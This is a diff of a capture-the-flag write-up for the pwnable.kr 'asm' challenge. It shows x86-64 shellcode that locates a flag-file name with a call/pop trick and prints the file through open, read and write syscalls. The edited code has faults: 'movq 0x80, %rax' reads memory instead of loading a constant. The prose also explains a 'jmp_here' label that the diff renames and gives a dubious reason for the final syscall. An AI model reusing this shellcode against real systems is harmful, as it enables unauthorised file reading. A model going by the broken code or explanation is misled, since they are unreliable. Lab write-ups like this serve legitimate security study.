Macmod/pwnable-writeups/toddlers/asm.md

     syscall

-    movl %eax, %edi  # first argument (return from open) leaq -100(%rsp), %rsi  # second argument (buffer address) movl %ebx, %edx  # third argument (size) movq $0, %rax  # read syscall code syscall
+    movl %eax, %edi  # first argument (return from open) leaq -100(%rbp), %rsi  # second argument (buffer address) movl %ebx, %edx  # third argument (size) movq $0, %rax  # read syscall code syscall

-    movl $1, %edi  # first argument (stdout descriptor) leaq -100(%rsp), %rsi  # second argument (buffer address) movl %ebx, %edx  # third argument (size) movq $1, %rax  # write syscall code syscall
+    movl $1, %edi  # first argument (stdout descriptor) leaq -100(%rbp), %rsi  # second argument (buffer address) movl %ebx, %edx  # third argument (size) movq $1, %rax  # write syscall code syscall
-    int 0x80

-jmp_here:
+    movq 0x80, %rax
+    syscall

+do_call:
     call jmp_back
 name:
     .string "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
 ```

 Why are we jumping to `jmp_here` and then calling `jmp_back` again?
-Because when we make a call, the return address is pushed onto the stack.
+Because, when we make a call, the return address is pushed onto the stack.
 Here the return address will be the address of `name`, which is now in the text segment.

 Right after the `jmp_here` jump, in `jmp_back`, we pop this address and store in `rdi`, the first argument of the `open` syscall later on.
 Lastly we add a `0x80` syscall (interrupt) to make sure our program doesn't loop forever.
 Genius!